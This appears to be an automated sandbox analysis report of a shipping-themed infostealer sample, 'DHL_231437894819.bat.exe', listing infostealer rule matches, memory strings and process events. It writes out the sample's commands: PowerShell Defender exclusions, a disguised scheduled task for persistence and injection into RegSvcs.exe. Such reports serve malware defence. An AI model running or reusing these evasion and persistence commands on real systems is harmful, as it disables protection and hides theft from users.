Source: DHL_231437894819.bat.exe, 00000000.00000002.1467243677.0000000002E15000.00000004.00000800.00020000.00000000.sdmp, DHL_231437894819.bat.exe, 00000000.00000002.1467243677.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1555427783.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://account.dyn.com/
Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.ipify.org
Source: RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.ipify.org/
Source: RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.ipify.org/t
Source: DHL_231437894819.bat.exe, uvbIwIYe.exe.0.dr; String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown; Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown; HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49714 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, n00.cs; .Net Code: Vv2F
Source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.raw.unpack, n00.cs; .Net Code: Vv2F

                      System Summary

Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.uvbIwIYe.exe.4b83228.2.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.uvbIwIYe.exe.4b83228.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.DHL_231437894819.bat.exe.478a620.3.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.uvbIwIYe.exe.4b47a08.0.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.uvbIwIYe.exe.4b47a08.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe; Code functions (process 0, run 2):
0_2_012B4B01, 0_2_012BD404, 0_2_06D9BB58, 0_2_06D936D7, 0_2_06D936E8, 0_2_06D915D0, 0_2_06D92E10,
0_2_06D91A08, 0_2_06D93BF8, 0_2_07111E7A, 0_2_071196C8, 0_2_07112CF8, 0_2_07110B90, 0_2_071180A0,
0_2_07114F10, 0_2_07114F00, 0_2_07119FBA, 0_2_07119FC8, 0_2_07118E40, 0_2_07118698, 0_2_07118688,
0_2_071196C7, 0_2_07113D08, 0_2_0711A570, 0_2_0711557A, 0_2_0711A560, 0_2_07115588, 0_2_07111440,
0_2_07112C97, 0_2_07112CAF, 0_2_07113CF8, 0_2_07110B3D, 0_2_07118358, 0_2_07118348, 0_2_07110B77,
0_2_07115398, 0_2_071153A8, 0_2_07118A90, 0_2_07118A80, 0_2_07113ADA, 0_2_07115118
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071151080_2_07115108
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071100070_2_07110007
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071100400_2_07110040
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071180900_2_07118090
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071148B80_2_071148B8
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071118D90_2_071118D9
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_076E61A80_2_076E61A8
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_076E47200_2_076E4720
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_076E47120_2_076E4712
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_076E41600_2_076E4160
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_076E41700_2_076E4170
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_076E9FF10_2_076E9FF1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01174AC010_2_01174AC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0117EE7810_2_0117EE78
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01173EA810_2_01173EA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_011741F010_2_011741F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D30A810_2_068D30A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068DC19010_2_068DC190
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D51E810_2_068D51E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D61F010_2_068D61F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068DAE2010_2_068DAE20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D798010_2_068D7980
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D72A010_2_068D72A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068DE3B010_2_068DE3B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D000610_2_068D0006
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D004010_2_068D0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D58E710_2_068D58E7
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_0169D40411_2_0169D404
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C80A011_2_076C80A0
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C2CF811_2_076C2CF8
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C0B9011_2_076C0B90
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C96C811_2_076C96C8
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C1E7A11_2_076C1E7A
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C868811_2_076C8688
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C869811_2_076C8698
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076CA56011_2_076CA560
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076CA57011_2_076CA570
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C834811_2_076C8348
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C835811_2_076C8358
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C004011_2_076C0040
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C000711_2_076C0007
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C809011_2_076C8090
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C4F0011_2_076C4F00
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C4F1011_2_076C4F10
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C8E4011_2_076C8E40
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C2CAF11_2_076C2CAF
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C2C9F11_2_076C2C9F
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C0B7711_2_076C0B77
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C0B3D11_2_076C0B3D
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C8A8011_2_076C8A80
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C8A9011_2_076C8A90
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C96C611_2_076C96C6
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C557811_2_076C5578
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C558811_2_076C5588
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C144011_2_076C1440
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C53A811_2_076C53A8
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C539811_2_076C5398
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C510811_2_076C5108
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C511811_2_076C5118
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C9FC811_2_076C9FC8
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C9FBA11_2_076C9FBA
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C3D0811_2_076C3D08
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C3CF811_2_076C3CF8
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C18D911_2_076C18D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_0127C34716_2_0127C347
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_0127EB7016_2_0127EB70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_01274AC016_2_01274AC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_01273EA816_2_01273EA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_012741F016_2_012741F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B2C38016_2_06B2C380
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B2AAE816_2_06B2AAE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B4B3F616_2_06B4B3F6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B430A816_2_06B430A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B4C18816_2_06B4C188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B461F016_2_06B461F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B451E816_2_06B451E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B458E716_2_06B458E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B4798016_2_06B47980
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B472A016_2_06B472A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B4E3A816_2_06B4E3A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B4237A16_2_06B4237A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B4004016_2_06B40040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06F733D016_2_06F733D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B4003B16_2_06B4003B
Source: DHL_231437894819.bat.exe | Static PE information: invalid certificate
Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.0000000003C14000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs DHL_231437894819.bat.exe
Source: DHL_231437894819.bat.exe, 00000000.00000002.1461903059.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs DHL_231437894819.bat.exe
Source: DHL_231437894819.bat.exe, 00000000.00000002.1476095082.0000000006F00000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs DHL_231437894819.bat.exe
Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename6d090dc9-6d2f-4d1c-bf4e-c434d24d7edf.exe4 vs DHL_231437894819.bat.exe
Source: DHL_231437894819.bat.exe, 00000000.00000000.1379737305.0000000000832000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamevFIL.exe. vs DHL_231437894819.bat.exe
Source: DHL_231437894819.bat.exe, 00000000.00000002.1477959036.000000000A510000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs DHL_231437894819.bat.exe
Source: DHL_231437894819.bat.exe, 00000000.00000002.1467243677.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename6d090dc9-6d2f-4d1c-bf4e-c434d24d7edf.exe4 vs DHL_231437894819.bat.exe
Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.00000000045C8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs DHL_231437894819.bat.exe
Source: DHL_231437894819.bat.exe | Binary or memory string: OriginalFilenamevFIL.exe. vs DHL_231437894819.bat.exe
Source: DHL_231437894819.bat.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.uvbIwIYe.exe.4b83228.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.uvbIwIYe.exe.4b83228.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DHL_231437894819.bat.exe.478a620.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.uvbIwIYe.exe.4b47a08.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.uvbIwIYe.exe.4b47a08.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: DHL_231437894819.bat.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: uvbIwIYe.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, NpXw3kw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, NpXw3kw.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, fpnV0Qjz.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, fpnV0Qjz.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, OcHrdeaLLWK7BX0qEn.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, j8ssktVmGhRhLe0B6k.cs | Security API names: _0020.SetAccessControl
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, j8ssktVmGhRhLe0B6k.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, j8ssktVmGhRhLe0B6k.cs | Security API names: _0020.AddAccessRule
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, OcHrdeaLLWK7BX0qEn.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, j8ssktVmGhRhLe0B6k.cs | Security API names: _0020.SetAccessControl
Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, j8ssktVmGhRhLe0B6k.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, j8ssktVmGhRhLe0B6k.cs | Security API names: _0020.AddAccessRule
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, OcHrdeaLLWK7BX0qEn.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, j8ssktVmGhRhLe0B6k.cs | Security API names: _0020.SetAccessControl
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, j8ssktVmGhRhLe0B6k.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, j8ssktVmGhRhLe0B6k.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/15@3/3
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | File created: C:\Users\user\AppData\Roaming\uvbIwIYe.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Mutant created: \Sessions\1\BaseNamedObjects\OpXSkSSFXYjockGTiz
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | File created: C:\Users\user\AppData\Local\Temp\tmp1E51.tmp
Source: DHL_231437894819.bat.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DHL_231437894819.bat.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DHL_231437894819.bat.exe | Virustotal: Detection: 65%
Source: DHL_231437894819.bat.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | File read: C:\Users\user\Desktop\DHL_231437894819.bat.exe
Source: unknown | Process created: C:\Users\user\Desktop\DHL_231437894819.bat.exe "C:\Users\user\Desktop\DHL_231437894819.bat.exe"
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\uvbIwIYe.exe C:\Users\user\AppData\Roaming\uvbIwIYe.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe"
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp"
